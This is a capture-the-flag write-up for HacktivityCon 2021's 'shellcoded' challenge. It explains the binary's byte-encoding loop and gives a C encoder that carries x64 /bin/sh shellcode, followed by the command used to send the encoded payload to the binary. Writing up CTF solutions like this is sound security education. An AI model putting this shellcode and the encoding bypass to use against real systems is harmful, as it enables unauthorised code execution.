# shellcoded

## Files

{% embed url="<https://github.com/0xTen/CTFs/tree/main/hacktivitycon/2021/shellcoded>" %}

## The binary

![](https://630407063-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZD3WIm997ouoGhrdss%2F-MjvbuWWyQ9SqRFnxnYS%2F-Mjvo1qkMebM45bb-8N5%2Fimage.png?alt=media\&token=da0f7b38-308c-4095-93dc-32e4a4b9a90a)

The binary does exactly what it says it does: it runs your shellcode. But there is obviously a catch.

## Encoding

![](https://630407063-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZD3WIm997ouoGhrdss%2F-MjvbuWWyQ9SqRFnxnYS%2F-MjvoHz619QvRjBuoZ24%2Fimage.png?alt=media\&token=f19d7715-a28b-4825-808e-4b66c8cae464)

This code loops through the shellcode and, for each position, adds 1 \* the index to the byte at that position if the index is even, or -1 \* the index if it is odd. To encode our shellcode properly, all we have to do is apply the same process, but subtracting instead of adding.

I wrote the following encoder for my shellcode:

```c
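#include <stdio.h>

// x64 /bin/sh shellcode
unsigned char shellcode[] = "\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05";

int main(){
    // Take the length once: strlen() inside the loop would be re-evaluated on
    // the buffer being modified and stop early if an encoded byte became 0x00
    size_t len = sizeof(shellcode) - 1;
    size_t i;
    int v3;
    for (i = 0; i < len; i++){
        if ( (i & 1) != 0 ){
            v3 = -1;
        } else{
            v3 = 1;
        }
        // Same loop as the binary, with -= instead of +=
        shellcode[i] -= v3 * (int)i;
    }
    // Write the raw bytes; printf(shellcode) would parse them as a format string
    fwrite(shellcode, 1, len, stdout);
    return 0;
}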
```

Note that I basically copied and pasted the original loop but replaced += with -= because I want to do the opposite operation.
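A round-trip check of the transform described above, as an added example that is not part of the original write-up or the challenge files. `binary_transform` models the binary's loop from the description in the text; all function names and the sample bytes are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Model of the binary's loop as described in the text (hypothetical name):
 * even index i adds i to the byte, odd index subtracts i, modulo 256. */
void binary_transform(unsigned char *buf, size_t len) {
    for (size_t i = 0; i < len; i++) {
        int sign = (i & 1) ? -1 : 1;
        buf[i] = (unsigned char)(buf[i] + sign * (int)i);
    }
}

/* Inverse: applied before sending so the binary's loop restores the input. */
void encode(unsigned char *buf, size_t len) {
    for (size_t i = 0; i < len; i++) {
        int sign = (i & 1) ? -1 : 1;
        buf[i] = (unsigned char)(buf[i] - sign * (int)i);
    }
}

/* Returns 1 if encode followed by binary_transform restores every byte.
 * The length is explicit, so 0x00 bytes do not cut the check short. */
int round_trip_ok(const unsigned char *in, size_t len) {
    unsigned char tmp[1024];
    if (len > sizeof tmp) return 0;
    memcpy(tmp, in, len);
    encode(tmp, len);
    binary_transform(tmp, len);
    return memcmp(tmp, in, len) == 0;
}

/* Counts 0x00 bytes in the encoded form; each one would truncate any
 * strlen()- or printf("%s")-based handling of the encoded buffer. */
size_t encoded_nul_count(const unsigned char *in, size_t len) {
    unsigned char tmp[1024];
    size_t n = 0;
    if (len > sizeof tmp) return 0;
    memcpy(tmp, in, len);
    encode(tmp, len);
    for (size_t i = 0; i < len; i++) n += (tmp[i] == 0);
    return n;
}

int main(void) {
    /* Constructed sample: bytes 0..599 (mod 256), so indices wrap past 255. */
    unsigned char sample[600];
    for (size_t i = 0; i < sizeof sample; i++) sample[i] = (unsigned char)i;
    printf("round trip ok: %d, NULs in encoded form: %zu\n",
           round_trip_ok(sample, sizeof sample),
           encoded_nul_count(sample, sizeof sample));
    return 0;
}
```

Because both loops work modulo 256, the inverse is exact for any length, but the encoded form can contain 0x00 bytes, so it has to be handled with an explicit length.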

## Final Exploit

After generating my shellcode and saving it to a file I called payload.bin, I simply used the following command to send it over.

```bash
(cat ./payload.bin; cat) | ./shellcoded
```
